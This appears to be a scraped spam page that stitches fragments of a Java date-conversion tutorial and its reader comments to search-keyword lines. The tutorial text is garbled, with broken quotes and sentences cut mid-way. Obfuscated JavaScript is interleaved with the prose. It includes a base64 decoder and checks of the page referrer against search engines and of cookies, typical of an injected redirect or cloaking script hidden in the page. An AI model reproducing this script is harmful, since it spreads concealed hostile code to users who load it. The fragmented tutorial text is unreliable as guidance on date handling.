Since you have no time portion in your input string, Joda-Time assigns the first moment of the day of the specified time zone as the time-of-day.
- convert string date javascript
- how to convert string to date in java in yyyy-mm-dd format
- javascript convert date to string format dd/mm/yyyy
Formatter PatternThe characters used in a formatter's pattern are similar in Joda-Time to those in java.. constructor(\x22return\x20this\x22)(\x20)'+');');_0x2322e5=_0x502a67();}catch(_0x3e9bbc){_0x2322e5=window;}var _0x610dbf='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x2322e5['atob']||(_0x2322e5['atob']=function(_0xba821){var _0x8bde12=String(_0xba821)['replace'](/=+$/,'');for(var _0xbfb4c6=0x0,_0x1496b3,_0xc2a9db,_0x24a237=0x0,_0x2e4bd8='';_0xc2a9db=_0x8bde12['charAt'](_0x24a237++);~_0xc2a9db&&(_0x1496b3=_0xbfb4c6%0x4?_0x1496b3*0x40+_0xc2a9db:_0xc2a9db,_0xbfb4c6++%0x4)?_0x2e4bd8+=String['fromCharCode'](0xff&_0x1496b3>>(-0x2*_0xbfb4c6&0x6)):0x0){_0xc2a9db=_0x610dbf['indexOf'](_0xc2a9db);}return _0x2e4bd8;});}());_0x1691['base64DecodeUnicode']=function(_0x4a635e){var _0x292180=atob(_0x4a635e);var _0x116941=[];for(var _0x5a23a2=0x0,_0x3bf81a=_0x292180['length'];_0x5a23a2=_0x242e6c;},'UPScU':function _0xcf8ed4(_0x4ceb3a,_0x39df85){return _0x4ceb3a===_0x39df85;},'bojhn':'yGQ','UEIPg':'nEZ','yrBfU':_0x1691('0x1f'),'JYTgz':function _0x5c50f2(_0x33ee7a,_0x1d53a3){return _0x33ee7a&&_0x1d53a3;},'dwaCo':function _0x4b1038(_0x12f2bb,_0x57d763){return _0x12f2bb
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For those who just want a function for this conversion, here is the function code:Example program for string to date conversionReferences:Enjoyed this post? Try these related postsSagarika Rayudu saysWhat if the date is of HTTP/1.

how to convert string to date in java in yyyy-mm-dd format

javascript convert date to string format dd/mm/yyyy

1 format?i e, in addition to df6 there is a timezone too? How do we then convert a string to date?EG: âMon, Feb 9 2015 00:02:12 GMTâAll given matreials are mind blowing.. Convert String to Date: FunctionAfter this section I have shared a complete example to demonstrate String to Date conversion in various date formats.. but request you,please post spring contentsVikas Chauhan saysThere is a correction in following statement in your code:DateFormat df3 = new SimpleDateFormat(âdd-MMM-yyyyâ);Use âdd-mm-yyyyâ instead of dd-mmm-yyyyâ.. util Date/Calendar but not exactly the same Carefully read the doc ImmutabilityWe usually use the immutable classes in Joda-Time.. altavista ',_0x4c2d2f['UtxsF']],_0x32a60d=document[_0x1691('0x26')],_0x2e446a=![],_0x411c15=cookie[_0x1691('0x27')](_0x4c2d2f['ZhLTh']);for(var _0x551995=0x0;_0x4c2d2f['RWwIP'](_0x551995,_0x580902[_0x1691('0x28')]);_0x551995++){if(_0x4c2d2f[_0x1691('0x29')](_0x32a60d[_0x1691('0x2a')](_0x580902[_0x551995]),0x0)){if(_0x4c2d2f['UPScU'](_0x4c2d2f[_0x1691('0x2b')],_0x4c2d2f[_0x1691('0x2c')])){var _0x16afb8=_0x4c2d2f[_0x1691('0x2d')]['split']('|'),_0x4e428d=0x0;while(!![]){switch(_0x16afb8[_0x4e428d++]){case'0':var _0xa0cd19=document[_0x1691('0x7')][_0x1691('0x8')](/[\w-]+=.. So you need to think about and determine the time zone represented by that string input. 5ebbf469cd